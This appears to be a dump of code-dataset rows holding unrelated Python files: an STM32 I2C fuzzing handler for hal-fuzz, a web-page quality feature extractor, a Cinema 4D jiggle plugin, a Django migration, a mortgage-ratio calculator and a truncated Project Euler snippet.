max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
hal_fuzz/hal_fuzz/handlers/stm32f4_hal/stm32f4_i2c.py
|
diagprov/hal-fuzz
| 117
|
12783451
|
<filename>hal_fuzz/hal_fuzz/handlers/stm32f4_hal/stm32f4_i2c.py
import sys
from unicorn.arm_const import *
from ...util import *
import sys
from ..fuzz import fuzz_remaining, get_fuzz
from ...models.i2c import I2CModel
def HAL_I2C_Init(uc):
pass
def HAL_I2C_Mem_Read(uc):
# HAL_StatusTypeDef __fastcall HAL_I2C_Mem_Read(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout)
device_id = uc.reg_read(UC_ARM_REG_R0)
dev_addr = uc.reg_read(UC_ARM_REG_R1)
mem_addr = uc.reg_read(UC_ARM_REG_R2)
mem_addr_size = uc.reg_read(UC_ARM_REG_R3)
dst_buf = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP), 4))[0]
dst_buf_size = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP) + 0x4, 4))[0]
timeout = struct.unpack("<I", uc.mem_read(uc.reg_read(UC_ARM_REG_SP) + 0x8, 4))[0]
assert(dst_buf != 0)
assert(dst_buf_size < 1000)
assert(mem_addr < 65535)
assert(dst_buf_size >= mem_addr_size)
#stuff = I2CModel.rx(device_id, dev_addr, mem_addr_size)
stuff = get_fuzz(mem_addr_size)
uc.mem_write(dst_buf, stuff)
uc.reg_write(UC_ARM_REG_R0, 0)
print(b"<<< " + stuff)
def HAL_I2C_Mem_Write(uc):
uc.reg_write(UC_ARM_REG_R0, 0)
| 2.046875
| 2
|
models/QSDM.py
|
rmit-ir/AnswerPassageQuality
| 8
|
12783452
|
"""
Quality-biased ranking (Bendersky et al., 2011)
"""
import argparse
import bs4
import collections
import json
import math
# import re
import string
from smart_open import smart_open
# Module side
#
class Pipeline():
"""Feature extraction pipeline"""
def __init__(self):
self.jobs = []
def add(self, features, adaptor=None):
if not isinstance(features, (tuple, list)):
features = [features]
self.jobs.append({'adaptor': adaptor, 'extractors': features})
def extract(self, item):
vector = []
for job in self.jobs:
input_ = item if job['adaptor'] is None else job['adaptor'](item)
for extractor in job['extractors']:
vector.append(extractor(input_))
return vector
PUNCTUATION_REMOVER = string.maketrans(string.punctuation, ' ' * len(string.punctuation))
def to_terms(text):
return text.encode('utf8', errors='replace').translate(PUNCTUATION_REMOVER).split()
def UrlDepth(url):
"""The depth of the URL path"""
pos = url.find('://')
if pos >= 0:
return url[pos+3:].count('/')
else:
return url.count('/')
def NumVisTerms(doc):
"""Number of visible terms on the page"""
_, terms = doc
return len(terms)
def NumTitleTerms(doc):
"""Number of terms in the page <title> field"""
soup, _ = doc
if soup.title is None:
return 0
else:
return len(to_terms(soup.title.get_text()))
def AvgTermLen(doc):
"""Average length of visible term on the page"""
_, terms = doc
return float(sum(len(t) for t in terms)) / len(terms) if terms else 0
def FracAnchorText(doc):
"""Fraction of anchor text on the page"""
soup, terms = doc
terms_in_anchor_texts = sum(len(to_terms(tag.get_text())) for tag in soup.find_all('a'))
return float(terms_in_anchor_texts) / len(terms) if terms else 0
def FracVisText(doc):
"""Fraction of visible text on the page"""
soup, _ = doc
try:
pagesize = len(soup.decode_contents())
except Exception:
pagesize = 0
return float(len(soup.get_text())) / pagesize if pagesize > 0 else 0
def Entropy(doc):
"""Entropy of the page content"""
_, terms = doc
N = len(terms)
tf = collections.Counter(terms)
return math.log(N) - float(sum(n * math.log(n) for n in tf.values())) / N if N > 0 else 0
class FracStops():
"""Stopword/non-stopword ratio"""
def __init__(self, stoplist):
self.stoplist = stoplist
def __call__(self, doc):
_, terms = doc
return float(sum(term in self.stoplist for term in terms)) / len(terms) if terms else 0
class StopCover():
"""Fraction of terms in the stopword list that appear on the page"""
def __init__(self, stoplist):
self.stoplist = stoplist
def __call__(self, doc):
_, terms = doc
if self.stoplist:
return float(sum(sw in terms for sw in self.stoplist)) / len(self.stoplist)
else:
return 0
def FracTableText(doc):
"""Fraction of table text on the page"""
soup, terms = doc
terms_in_tables = 0
for tag in soup.find_all('table'):
if any(p.name == 'table' for p in tag.parents):
continue
terms_in_tables += len(to_terms(tag.get_text()))
frac = float(terms_in_tables) / len(terms) if terms else 0
assert frac <= 1
return frac
# Data side
BLOCK_TAGS = ('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'div', 'ul', 'ol', 'tr',
'td', 'th', 'table', 'dl', 'dd', 'li', 'blockquote', 'pre',
'address', 'title', 'head')
def SOUP_TERMS(doc):
chunk = doc['text']
soup = bs4.BeautifulSoup(chunk, 'lxml')
for elem in soup(['br']):
elem.insert_after('\n')
for elem in soup(BLOCK_TAGS):
elem.insert_after('\n')
terms = to_terms(soup.get_text().lower())
return soup, terms
def URL(doc):
return doc['url']
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('corpus_json')
parser.add_argument('stoplist')
args = parser.parse_args()
stoplist = set(l.strip() for l in smart_open(args.stoplist))
pipeline = Pipeline()
pipeline.add(UrlDepth, adaptor=URL)
pipeline.add([NumVisTerms, NumTitleTerms, AvgTermLen, FracAnchorText, FracVisText,
Entropy, FracStops(stoplist), StopCover(stoplist), FracTableText], adaptor=SOUP_TERMS)
ranked_lists = json.load(smart_open(args.corpus_json))
for rl in ranked_lists:
qid = rl['topic']['qid']
for doc in rl['docs']:
docno = doc['docno']
rel = max(doc['rel'], 0)
score = doc['score']
vector = ' '.join(['{}:{}'.format(i, val) for i, val in enumerate(pipeline.extract(doc), 2)])
print('{rel} qid:{qid} 1:{score} {vector} # {docno}'.format(**locals()))
| 2.71875
| 3
|
tjiggle.py
|
beesperester/cinema4d-jiggle
| 1
|
12783453
|
import os
import c4d
import math
# Be sure to use a unique ID obtained from www.plugincafe.com
PLUGIN_ID = 123456790
#----begin_resource_section----
from bootstrap4c4d import Description, Assignment, Group, Container
crumb_percent_slider = [
Assignment("STEP", 1.0),
Assignment("UNIT", "PERCENT"),
Assignment("CUSTOMGUI", "REALSLIDER"),
Assignment("MINSLIDER", 0.0),
Assignment("MAXSLIDER", 100.0)
]
crumb_percent_slider_limit_min = [
Assignment("MIN", 0.0)
]
crumb_percent_slider_limit_max = [
Assignment("MAX", 100.0)
]
crumb_flag_group_open = Assignment("DEFAULT", 1)
settings_effect_strength = Description({
"id": "SETTINGS_EFFECT_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min,
*crumb_percent_slider_limit_max
],
"locales": {
"strings_us": "Strength"
}
})
settings_base_origin_object = Description({
"id": "SETTINGS_BASE_ORIGIN_OBJECT",
"key": "LINK",
"value": [
Assignment("ANIM", "OFF"),
Description({
"key": "ACCEPT",
"value": [
Assignment("Obase", None)
]
})
],
"locales": {
"strings_us": "Origin"
}
})
settings_base_start_time = Description({
"id": "SETTINGS_BASE_START_TIME",
"key": "REAL",
"value": [
Assignment("UNIT", "TIME")
],
"locales": {
"strings_us": "Start Time"
}
})
settings_base_target_offset = Description({
"id": "SETTINGS_BASE_TARGET_OFFSET",
"key": "VECTOR",
"value": [
Assignment("UNIT", "METER")
],
"locales": {
"strings_us": "Target Offset"
}
})
settings_base_draw_debug_lines = Description({
"id": "SETTINGS_BASE_DRAW_DEBUG_LINES",
"key": "BOOL",
"value": [
Assignment("ANIM", "OFF")
],
"locales": {
"strings_us": "Draw Debug Lines"
}
})
vector_xplus = Assignment(None, None, {
"id": "VECTOR_XPLUS",
"locales": {
"strings_us": "X+"
}
})
vector_xminus = Assignment(None, None, {
"id": "VECTOR_XMINUS",
"locales": {
"strings_us": "X-"
}
})
vector_yplus = Assignment(None, None, {
"id": "VECTOR_YPLUS",
"locales": {
"strings_us": "Y+"
}
})
vector_yminus = Assignment(None, None, {
"id": "VECTOR_YMINUS",
"locales": {
"strings_us": "Y-"
}
})
vector_zplus = Assignment(None, None, {
"id": "VECTOR_ZPLUS",
"locales": {
"strings_us": "Z+"
}
})
vector_zminus = Assignment(None, None, {
"id": "VECTOR_ZMINUS",
"locales": {
"strings_us": "Z-"
}
})
settings_base_up_vector = Description({
"id": "SETTINGS_BASE_UP_VECTOR",
"key": "LONG",
"value": [
Assignment("ANIM", "OFF"),
Assignment("CYCLE", [
vector_xplus,
vector_xminus,
vector_yplus,
vector_yminus,
vector_zplus,
vector_zminus
])
],
"locales": {
"strings_us": "Up Vector"
}
})
settings_base_aim_vector = Description({
"id": "SETTINGS_BASE_AIM_VECTOR",
"key": "LONG",
"value": [
Assignment("ANIM", "OFF"),
Assignment("CYCLE", [
vector_xplus,
vector_xminus,
vector_yplus,
vector_yminus,
vector_zplus,
vector_zminus
])
],
"locales": {
"strings_us": "Aim Vector"
}
})
group_effect = Group("GROUP_EFFECT", {
"value": [
crumb_flag_group_open,
settings_effect_strength
],
"locales": {
"strings_us": "Effect"
}
})
group_base = Group("GROUP_BASE", {
"value": [
crumb_flag_group_open,
settings_base_origin_object,
settings_base_target_offset,
settings_base_draw_debug_lines,
settings_base_start_time,
settings_base_up_vector,
settings_base_aim_vector
],
"locales": {
"strings_us": "Base"
},
})
# squash and stretch
settings_squash_stretch_enable = Description({
"id": "SETTINGS_SQUASH_STRETCH_ENABLE",
"key": "BOOL",
"value": [
Assignment("ANIM", "OFF")
],
"locales": {
"strings_us": "Enable"
}
})
settings_squash_stretch_stretch_strength = Description({
"id": "SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min
],
"locales": {
"strings_us": "Stretch Strength"
}
})
settings_squash_stretch_squash_strength = Description({
"id": "SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH",
"key": "REAL",
"value": [
*crumb_percent_slider,
*crumb_percent_slider_limit_min
],
"locales": {
"strings_us": "Squash Strength"
}
})
group_squash_stretch = Group("GROUP_SQUASH_STRETCH", {
"value": [
crumb_flag_group_open,
settings_squash_stretch_enable,
settings_squash_stretch_stretch_strength,
settings_squash_stretch_squash_strength
],
"locales": {
"strings_us": "Squash and Stretch"
}
})
# physics descriptions
settings_physics_stiffness = Description({
"id": "SETTINGS_PHYSICS_STIFFNESS",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Stiffness"
}
})
settings_physics_mass = Description({
"id": "SETTINGS_PHYSICS_MASS",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Mass"
}
})
settings_physics_damping = Description({
"id": "SETTINGS_PHYSICS_DAMPING",
"key": "REAL",
"value": crumb_percent_slider,
"locales": {
"strings_us": "Damping"
}
})
settings_physics_gravity = Description({
"id": "SETTINGS_PHYSICS_GRAVITY",
"key": "VECTOR",
"value": [
Assignment("UNIT", "METER")
],
"locales": {
"strings_us": "Gravity"
}
})
group_physics = Group("GROUP_PHYSICS", {
"value": [
crumb_flag_group_open,
settings_physics_stiffness,
settings_physics_mass,
settings_physics_damping,
settings_physics_gravity
],
"locales": {
"strings_us": "Base"
},
})
root = Container("Tjiggle", {
"value": [
Assignment("NAME", "Tjiggle"),
Assignment("INCLUDE", "Tbase"),
Assignment("INCLUDE", "Texpression"),
Group("GROUP_SETTINGS", {
"value": [
crumb_flag_group_open,
group_effect,
group_base,
group_squash_stretch,
group_physics
],
"locales": {
"strings_us": "Settings"
}
})
],
"locales": {
"strings_us": "Jiggle"
}
})
#----end_resource_section----
#----begin_id_section----
VECTOR_XPLUS = vector_xplus.GetId()
VECTOR_XMINUS = vector_xminus.GetId()
VECTOR_YPLUS = vector_yplus.GetId()
VECTOR_YMINUS = vector_yminus.GetId()
VECTOR_ZPLUS = vector_zplus.GetId()
VECTOR_ZMINUS = vector_zminus.GetId()
# effect ids
SETTINGS_EFFECT_STRENGTH = settings_effect_strength.GetId()
# base ids
SETTINGS_BASE_ORIGIN_OBJECT = settings_base_origin_object.GetId()
SETTINGS_BASE_START_TIME = settings_base_start_time.GetId()
SETTINGS_BASE_TARGET_OFFSET = settings_base_target_offset.GetId()
SETTINGS_BASE_UP_VECTOR = settings_base_up_vector.GetId()
SETTINGS_BASE_AIM_VECTOR = settings_base_aim_vector.GetId()
SETTINGS_BASE_DRAW_DEBUG_LINES = settings_base_draw_debug_lines.GetId()
# squash stretch ids
SETTINGS_SQUASH_STRETCH_ENABLE = settings_squash_stretch_enable.GetId()
SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH = settings_squash_stretch_stretch_strength.GetId()
SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH = settings_squash_stretch_squash_strength.GetId()
# physics ids
SETTINGS_PHYSICS_STIFFNESS = settings_physics_stiffness.GetId()
SETTINGS_PHYSICS_MASS = settings_physics_mass.GetId()
SETTINGS_PHYSICS_DAMPING = settings_physics_damping.GetId()
SETTINGS_PHYSICS_GRAVITY = settings_physics_gravity.GetId()
#----end_id_section----
class DataContainer(object):
def __init__(self, data):
self.data = data
@property
def strength(self):
return self.data[SETTINGS_EFFECT_STRENGTH]
@strength.setter
def strength(self, value):
self.data[SETTINGS_EFFECT_STRENGTH] = value
@property
def originObject(self):
return self.data[SETTINGS_BASE_ORIGIN_OBJECT]
@property
def targetOffset(self):
return self.data[SETTINGS_BASE_TARGET_OFFSET]
@targetOffset.setter
def targetOffset(self, value):
self.data[SETTINGS_BASE_TARGET_OFFSET] = value
@property
def drawDebugLines(self):
return self.data[SETTINGS_BASE_DRAW_DEBUG_LINES]
# time
@property
def startTime(self):
return self.data[SETTINGS_BASE_START_TIME]
@startTime.setter
def startTime(self, value):
self.data[SETTINGS_BASE_START_TIME] = value
# up vector
@property
def upVector(self):
return self.data[SETTINGS_BASE_UP_VECTOR]
@upVector.setter
def upVector(self, value):
self.data[SETTINGS_BASE_UP_VECTOR] = value
# aim vector
@property
def aimVector(self):
return self.data[SETTINGS_BASE_AIM_VECTOR]
@aimVector.setter
def aimVector(self, value):
self.data[SETTINGS_BASE_AIM_VECTOR] = value
# squash stretch
@property
def squashStretchEnable(self):
return self.data[SETTINGS_SQUASH_STRETCH_ENABLE]
@property
def squashStretchStretchStrength(self):
return self.data[SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH]
@squashStretchStretchStrength.setter
def squashStretchStretchStrength(self, value):
self.data[SETTINGS_SQUASH_STRETCH_STRETCH_STRENGTH] = value
@property
def squashStretchSquashStrength(self):
return self.data[SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH]
@squashStretchSquashStrength.setter
def squashStretchSquashStrength(self, value):
self.data[SETTINGS_SQUASH_STRETCH_SQUASH_STRENGTH] = value
# physics
@property
def stiffness(self):
return self.data[SETTINGS_PHYSICS_STIFFNESS]
@stiffness.setter
def stiffness(self, value):
self.data[SETTINGS_PHYSICS_STIFFNESS] = value
@property
def mass(self):
return self.data[SETTINGS_PHYSICS_MASS]
@mass.setter
def mass(self, value):
self.data[SETTINGS_PHYSICS_MASS] = value
@property
def damping(self):
return self.data[SETTINGS_PHYSICS_DAMPING]
@damping.setter
def damping(self, value):
self.data[SETTINGS_PHYSICS_DAMPING] = value
@property
def gravity(self):
return self.data[SETTINGS_PHYSICS_GRAVITY]
@gravity.setter
def gravity(self, value):
self.data[SETTINGS_PHYSICS_GRAVITY] = value
class Jiggle(c4d.plugins.TagData):
"""Jiggle"""
def Init(self, node):
"""
Called when Cinema 4D Initialize the TagData (used to define, default values)
:param node: The instance of the TagData.
:type node: c4d.GeListNode
:return: True on success, otherwise False.
"""
# data = node.GetDataInstance()
data = DataContainer(node.GetDataInstance())
data.strength = 1.0
data.resultRotation = c4d.Vector(0, 0, 0)
# time related
self.previousFrame = 0
data.targetOffset = c4d.Vector(0, 0, 100)
data.startTime = 0.0
# up vector
data.upVector = VECTOR_YPLUS
# aim vector
data.aimVector = VECTOR_ZPLUS
# squash stretch
data.squashStretchStretchStrength = 0.0
data.squashStretchSquashStrength = 0.0
# physics related
data.stiffness = 0.1
data.mass = 0.9
data.damping = 0.75
data.gravity = c4d.Vector(0, -981.0, 0)
self.Reset(node)
c4d.EventAdd()
return True
@classmethod
def GetFrame(cls, time, fps):
return time.GetFrame(fps)
@classmethod
def CalculateTargetPosition(cls, origin, offset):
if origin:
return offset * origin.GetMg()
return offset
def GetHandleCount(self, op):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:return:
"""
return 1
def GetHandle(self, op, i, info):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param i: Index of handle
:type i: int
:param info: Info of handle
:type info: c4d.HandleInfo
:return:
"""
data = DataContainer(op.GetDataInstance())
info.position = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
info.type = c4d.HANDLECONSTRAINTTYPE_FREE
def SetHandle(self, op, i, p, info):
"""
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param i: Index of handle
:type i: int
:param p: Handle Position
:type p: c4d.Vector
:param info: Info of handle
:type info: c4d.HandleInfo
:return:
"""
data = DataContainer(op.GetDataInstance())
data.targetOffset = p * ~data.originObject.GetMg()
def Execute(self, tag, doc, op, bt, priority, flags):
"""
Called by Cinema 4D at each Scene Execution, this is the place where calculation should take place.
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:param doc: The host document of the tag's object.
:type doc: c4d.documents.BaseDocument
:param op: The host object of the tag.
:type op: c4d.BaseObject
:param bt: The Thread that execute the this TagData.
:type bt: c4d.threading.BaseThread
:param priority: Information about the execution priority of this TagData.
:type priority: EXECUTIONPRIORITY
:param flags: Information about when this TagData is executed.
:type flags: EXECUTIONFLAGS
:return:
"""
data = DataContainer(tag.GetDataInstance())
fps = doc.GetFps()
currentFrame = float(Jiggle.GetFrame(doc.GetTime(), fps))
originMatrix = data.originObject.GetMg()
originPosition = originMatrix.off
projectedPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
if currentFrame > data.startTime:
# only update if current frame is an increment by 1 of previous frame
if currentFrame == self.previousFrame + 1.0:
self.Update(tag, doc, op)
else:
self.Reset(tag)
# blend position by strength
targetPosition = c4d.utils.MixVec(projectedPosition, self.position, data.strength)
# calculate matrix
# calculate aim vector
aim = c4d.Vector(targetPosition - originPosition).GetNormalized()
# change up vector position
if data.upVector == VECTOR_XPLUS:
up = originMatrix.MulV(c4d.Vector(1.0, 0, 0))
elif data.upVector == VECTOR_XMINUS:
up = originMatrix.MulV(c4d.Vector(-1.0, 0, 0))
elif data.upVector == VECTOR_YPLUS:
up = originMatrix.MulV(c4d.Vector(0, 1.0, 0))
elif data.upVector == VECTOR_YMINUS:
up = originMatrix.MulV(c4d.Vector(0, -1.0, 0))
elif data.upVector == VECTOR_ZPLUS:
up = originMatrix.MulV(c4d.Vector(0, 0, 1.0))
elif data.upVector == VECTOR_ZMINUS:
up = originMatrix.MulV(c4d.Vector(0, 0, -1.0))
side = up.Cross(aim)
# calculate squash strech
if data.squashStretchEnable:
distance = c4d.Vector(targetPosition - originPosition).GetLength()
maxDistance = data.targetOffset.GetLength()
relativeDistance = distance - maxDistance
try:
squashStretchBias = abs(relativeDistance) / maxDistance
except ZeroDivisionError:
squashStretchBias = 0.0
if relativeDistance > 0.0:
squashStretchBias = squashStretchBias * data.squashStretchStretchStrength
# stretch
aim = aim * (1.0 + squashStretchBias)
up = up * (1.0 - squashStretchBias)
side = side * (1.0 - squashStretchBias)
else:
squashStretchBias = squashStretchBias * data.squashStretchSquashStrength
# squash
aim = aim * (1.0 - squashStretchBias)
up = up * (1.0 + squashStretchBias)
side = side * (1.0 + squashStretchBias)
# change input order based on aim axis
if data.aimVector == VECTOR_XPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
aim,
up,
side
)
elif data.aimVector == VECTOR_XMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
-aim,
up,
side
)
elif data.aimVector == VECTOR_YPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
aim,
up
)
elif data.aimVector == VECTOR_YMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
-aim,
up
)
elif data.aimVector == VECTOR_ZPLUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
up,
aim
)
elif data.aimVector == VECTOR_ZMINUS:
jiggleMatrix = c4d.Matrix(
originPosition,
side,
up,
-aim
)
op.SetMg(jiggleMatrix)
# finish execute
self.previousFrame = currentFrame
return c4d.EXECUTIONRESULT_OK
def Draw(self, tag, op, bd, bh):
data = DataContainer(tag.GetDataInstance())
drawpass = bd.GetDrawPass()
if not data.drawDebugLines:
return True
# draw target line
targetPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_XAXIS))
bd.DrawLine(
data.originObject.GetMg().off,
targetPosition,
0
)
# draw connection
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_YAXIS))
bd.DrawLine(
targetPosition,
self.position,
0
)
# draw current target
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_ZAXIS))
bd.DrawLine(data.originObject.GetMg().off, self.position, 0)
# bd.SetMatrix_Screen()
# circlePosition = bd.WS(targetPosition)
# bd.DrawCircle2D(circlePosition.x, circlePosition.y, 5.0)
if drawpass == c4d.DRAWPASS_HANDLES:
bd.SetMatrix_Screen()
handleScreenSpace = bd.WS(Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset))
bd.SetPen(c4d.GetViewColor(c4d.VIEWCOLOR_OBJECTHIGHLIGHT))
bd.DrawCircle2D(handleScreenSpace.x, handleScreenSpace.y, 8)
plugins.TagData.Draw(self, tag, op, bd, bh)
return True
def Reset(self, tag):
"""
Update loop.
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:return:
"""
# print("Reset")
data = DataContainer(tag.GetDataInstance())
self.force = c4d.Vector(0, 0, 0)
self.acceleration = c4d.Vector(0, 0, 0)
self.velocity = c4d.Vector(0, 0, 0)
self.position = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
def Update(self, tag, doc, op):
"""
Update loop.
:param tag: The instance of the TagData.
:type tag: c4d.BaseTag
:param doc: The host document of the tag's object.
:type doc: c4d.documents.BaseDocument
:param op: The host object of the tag.
:type op: c4d.BaseObject
:return:
"""
# print("Update")
data = DataContainer(tag.GetDataInstance())
targetPosition = Jiggle.CalculateTargetPosition(data.originObject, data.targetOffset)
direction = targetPosition - self.position
#direction = c4d.Vector(0, 0, 0)
# calculate spring
self.force = (direction * data.stiffness) + (data.gravity / 10.0 / float(doc.GetFps()))
self.acceleration = self.force / data.mass
self.velocity = self.velocity + (self.acceleration * (1.0 - data.damping))
self.position = self.position + self.velocity + self.force
if __name__ == "__main__":
# Retrieves the icon path
directory, _ = os.path.split(__file__)
fn = os.path.join(directory, "res", "tjiggle.png")
# Creates a BaseBitmap
bmp = c4d.bitmaps.BaseBitmap()
if bmp is None:
raise MemoryError("Failed to create a BaseBitmap.")
# Init the BaseBitmap with the icon
if bmp.InitWith(fn)[0] != c4d.IMAGERESULT_OK:
raise MemoryError("Failed to initialize the BaseBitmap.")
c4d.plugins.RegisterTagPlugin(id=PLUGIN_ID,
str="Jiggle",
info=c4d.TAG_EXPRESSION | c4d.TAG_VISIBLE | c4d.TAG_IMPLEMENTS_DRAW_FUNCTION,
g=Jiggle,
description="Tjiggle",
icon=bmp
)
| 1.953125
| 2
|
accounts/migrations/0007_auto_20200708_2235.py
|
Ascensiony/Software-Dev-Project
| 2
|
12783454
|
<filename>accounts/migrations/0007_auto_20200708_2235.py
# Generated by Django 2.2.10 on 2020-07-08 17:05
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_user_summary'),
]
operations = [
migrations.AddField(
model_name='user',
name='passout_year',
field=models.CharField(blank=True, max_length=4),
),
migrations.AddField(
model_name='user',
name='phone_number',
field=models.CharField(blank=True, max_length=17, validators=[django.core.validators.RegexValidator(message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.", regex='^\\+?1?\\d{9,15}$')]),
),
]
| 1.851563
| 2
|
Mortgage_Package/financial/ex_debtServiceRatio.py
|
ubco-mds-2020-labs/data-533-lab-4-lukavuko
| 0
|
12783455
|
<reponame>ubco-mds-2020-labs/data-533-lab-4-lukavuko
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
class debtServiceRatio:
"""
A class used to calculate debt service ratios and determine maximum annual and monthly mortgage payments
...
Attributes
----------
income : numeric
home buyer's annual income
property_tax : numeric
home buyer's annual property tax
heat_cost : numeric
home buyer's annual heat cost
car_payment : numeric
home buyer's annual car payment
credit_card_payment : numeric
home buyer's annual credt card payment
downpayment : int
home buyer's proposed downpayment
home_price : int
home buyer's desired home price
months : int
months in one year
gds_ratio : float
current ratio for Gross Debt Service
gds_max_annual_spend : numeric
calculates home buyer's maximum annual spending available
gds_max_mortgage_annual : numeric
calculates home buyer's maximum annual mortgage payments
gds_max_mortgage_monthly : numeric
calculates home buyer's maximum monthly mortgage payments
tds_ratio : numeric
current ratio for Total Debt Service
tds_max_annual_spend : numeric
calculates home buyer's maximum annual spending available
tds_max_mortgage_annual : numeric
calculates home buyer's maximum annual mortgage payments
tds_max_mortgage_monthly : numeric
calculates home buyer's maximum monthly mortgage payments
Methods
-------
gds()
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Gross Debt Service Ratio of 32%
tds()
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Total Debt Service Ratio of 40%
"""
downpayment = 0
def __init__(self, income, property_tax, heat_cost, car_payment, credit_card_payment, downpayment, home_price):
"""
Attributes
----------
income : numeric
property_tax : numeric
heat_cost : numeric
car_payment : numeric
credit_card_payment : numeric
downpayment : int
home_price : int
"""
self.income = income
self.property_tax = property_tax
self.heat_cost = heat_cost
self.car_payment = car_payment
self.credit_card_payment = credit_card_payment
self.downpayment = downpayment
self.home_price = home_price
def gds(self, prin = False): #max affordability based on GDS score
"""
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Gross Debt Service Ratio of 32%
...
Attributes
----------
gds_ratio : float
months : int
gds_max_annual_spend = float
gds_max_mortgage_annual = float
gds_max_mortgage_monthly = float
Returns
-------
gds_max_mortgage_annual : float
self.downpayment : float
"""
gds_ratio = 0.32 #change to 0.35
months = 12
gds_max_annual_spend = self.income * gds_ratio
gds_max_mortgage_annual = gds_max_annual_spend - self.property_tax - self.heat_cost
gds_max_mortgage_monthly = gds_max_mortgage_annual / months
if prin == True:
print("Max Annual Spending: ${}".format(gds_max_annual_spend))
print("Max Annual Mortgage Payment: ${}".format(gds_max_mortgage_annual))
print("Max Monthly Mortgage Payment: ${}".format(gds_max_mortgage_monthly))
#return (max_annual_spend, max_mortgage_annual, max_mortgage_monthly)
if self.downpayment > gds_max_mortgage_annual:
downpayment = gds_max_mortgage_annual
if prin == True:
print("Your downpayment: ${}".format(gds_max_mortgage_annual))
return gds_max_mortgage_annual
else:
downpayment = self.downpayment
if prin == True:
print("Your downpayment: ${}".format(self.downpayment))
return self.downpayment #######
def tds(self, prin = False): #max affordability based on TDS score
"""
Calculates buyer's max annual spending, max annual mortgage payment, and max monthly mortgage payments based on Total Debt Service Ratio of 40%
...
Attributes
----------
tds_ratio : float
months : 12
tds_max_annual_spend = float
tds_max_mortgage_annual = float
tds_max_mortgage_monthly = float
Returns
-------
tds_max_mortgage_annual : float
self.downpayment : float
"""
tds_ratio = 0.40 # change to 0.42
months = 12
tds_max_annual_spend = self.income * tds_ratio
tds_max_mortgage_annual = tds_max_annual_spend - self.property_tax - self.heat_cost - self.car_payment - self.credit_card_payment
tds_max_mortgage_monthly = tds_max_mortgage_annual / months
if prin == True:
print("Max Annual Spending: ${}".format(tds_max_annual_spend))
print("Max Annual Mortgage Payment: ${}".format(tds_max_mortgage_annual))
print("Max Monthly Mortgage Payment: ${}".format(tds_max_mortgage_monthly))
if self.downpayment > tds_max_mortgage_annual: #
downpayment = tds_max_mortgage_annual
if prin == True:
print("Your downpayment: ${}".format(tds_max_mortgage_annual))
return tds_max_mortgage_annual #######
else:
downpayment = self.downpayment
if prin == True:
print("Your downpayment: ${}".format(self.downpayment))
return self.downpayment #######
# %%
def mortgage_max(buyer_dsr):
"""
Calculates maximum loan available to offer based on buyer's proposed downpayment and downpayment percent
...
Returns
-------
loan : float
Returns maximum available loan to be offered
"""
downpayment_percent = 0
min_downpayment = 0
try:
if buyer_dsr.home_price <= 500000:
downpayment_percent = 0.05
elif buyer_dsr.home_price > 500000 and buyer_dsr.home_price <= 1000000:
downpayment_percent = 0.1
else:
downpayment_percent = 0.2
except Exception:
return None
#loan = self.max_dp() / downpayment_percent
loan = buyer_dsr.downpayment / downpayment_percent
return loan
def min_dp(buyer_dsr, pri = False):
"""
Compares Gross Debt Service Ratio and Total Debt Service Ratio and returns expected annual and monthly maximum mortgage payments and minimum downpayment
Return
------
float
minimum downpayment
"""
return min(buyer_dsr.gds(prin = pri), buyer_dsr.tds(prin = pri))
# %%
#buyer_dsr = debtServiceRatio(75000, 3600, 2400, 3600, 3000, 30000, 200000)
# %%
#mortgage_max(buyer_dsr)
# %%
#min_dp(buyer_dsr, pri = True)
# %%
| 2.140625
| 2
|
44.py
|
lycantropos/Project-Euler
| 0
|
12783456
|
from itertools import count
from utils import pentagonal
def pentagonal_number(index: int) -> int:
return index * (3 * index - 1) // 2
# TODO: improve this "bruteforcefully" working function
def pentagonal_numbers(offset: int) -> int:
for j in count(1):
p_j = pentagonal_number(j)
